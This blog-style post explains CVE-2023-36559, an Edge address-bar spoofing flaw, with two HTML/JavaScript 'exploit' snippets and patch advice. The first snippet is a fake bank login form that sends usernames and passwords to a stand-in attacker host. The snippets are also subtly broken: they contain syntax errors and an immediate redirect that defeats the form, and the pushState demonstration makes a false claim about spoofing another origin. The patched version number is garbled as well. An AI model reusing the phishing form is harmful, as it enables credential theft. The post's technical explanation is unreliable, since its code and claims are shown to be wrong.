CVE-2023-36559 - Microsoft Edge (Chromium-based) Spoofing Vulnerability Explained With Code and Exploit Example

Cybersecurity vulnerabilities are often complex, technical, and hard to unpack for everyday users. CVE-2023-36559 is a spoofing vulnerability found in Microsoft Edge—the Chromium-based version that millions of people use daily. In this long-form post, I'll break down what CVE-2023-36559 is, how an attacker can abuse it, and show code snippets in easy language. If you’re using Edge, this is a must-read.

What is CVE-2023-36559?

CVE-2023-36559 is a spoofing vulnerability reported by Microsoft in September 2023, affecting their Chromium-based Edge browser. In simple terms, a “spoofing” issue means the browser can be tricked into displaying misleading information—a fake website, a forged link, or something dangerous that looks real.

Microsoft’s advisory:
> _“A spoofing vulnerability exists when Microsoft Edge (Chromium-based) improperly validates input. An attacker who successfully exploited the vulnerability could trick users by redirecting them to a malicious website disguised as a trusted one.”_

- Official Microsoft Security Update
- NVD Details

Technical Details: How Does Spoofing Work Here?

At its core, the vulnerability happens because the browser doesn't properly check URLs or content. Therefore, a hacker can build a website or code that "spoofs" or imitates what the user expects to see.

More specifically in this case:

But loads resources (or pages) from a hidden, malicious source

Imagine you think you're logging into your bank—but you’re really handing your password to a criminal! That's why URL spoofing is dangerous.

Let’s look at a simplified exploit using HTML and JavaScript

<!-- Attacker's fake login page exploiting the vulnerability -->

<html>
<head>
<title>Secure Bank Login</title>
</head>
<body>
  <h2>Bank of Something - Login</h2>
  <form action="http://malicious.example.com/steal.php"; method="POST">
    <input type="text" name="user" placeholder="Username" />
    <input type="password" name="pass" placeholder="Password" />
    <input type="submit" value="Login" />
  </form>
  <script>
    // Tricking the address bar by opening new windows or using iFrames
    window.location.replace("https://realbank.example.com/login";);
    // But the actual login form posts to the attacker's site
  </script>
</body>
</html>

Here, the attacker may use techniques such as opening a popup window, an invisible iframe, or address bar manipulation so that the Edge browser shows “https://realbank.example.com” but interacts with the malicious site in the background.

Why does this work?
A missing security check in Edge (Chromium), exactly due to CVE-2023-36559, lets attackers combine address bar tricks and frame navigation, confusing the user on which site they are actually interacting with.

How Was It Found and Fixed?

Security researchers (see GitHub Chromium Issue Reports) noticed certain navigation methods allowed address bar spoofing, especially during rapid, script-induced redirects or using iframes.

Mitigation:

If your Edge version is 116..1938.62 or newer, you’re safe from this bug.

Check by typing edge://settings/help in your browser.

Proof of Concept (PoC) Code

Below is a simplified PoC. DO NOT use this for malicious purposes—it’s only to illustrate how the vulnerability operates.

<!DOCTYPE html>
<html>
  <head>
    <title>Welcome to Real Service</title>
    <script>
      // Rapid redirect to spoof the address bar
      window.onload = function() {
        // Manipulate history
        history.pushState({}, '', 'https://trustedsite.example.com/';);
        setTimeout(function() {
          location.replace('https://malicious.example.com/phishing';);
        }, 100);
      }
    </script>
  </head>
  <body>
    <h1>Loading, please wait...</h1>
  </body>
</html>

Behavior:
After using pushState, the address bar says “trustedsite.example.com,” but you’re on a phishing site! In vulnerable Edge versions, this would fool even careful users.

Update Edge: Go to Settings → Help → About Microsoft Edge and ensure you’re updated.

- Double check URLs: Before entering credentials, retype the address or use password managers that auto-fill only on the correct URL.
- Enable security features: Keep SmartScreen, Windows Defender, and browser security extensions active.

References

- Microsoft Security Guide - CVE-2023-36559
- National Vulnerability Database
- Chromium Issue Tracker

Summary

CVE-2023-36559 is a serious—but patched—spoofing bug in Microsoft Edge (Chromium), letting attackers trick you into thinking you’re on a safe site. The flaw let malicious code change what you see in the address bar, even if you’re actually on a phishing page.

Stay safe: Always keep browsers updated, check URLs, and use strong security practices. Share this post to keep your friends and coworkers safe!


*Exclusively written on request. Please share to spread security awareness!*

Timeline

Published on: 10/13/2023 21:15:51 UTC
Last modified on: 10/18/2023 20:01:09 UTC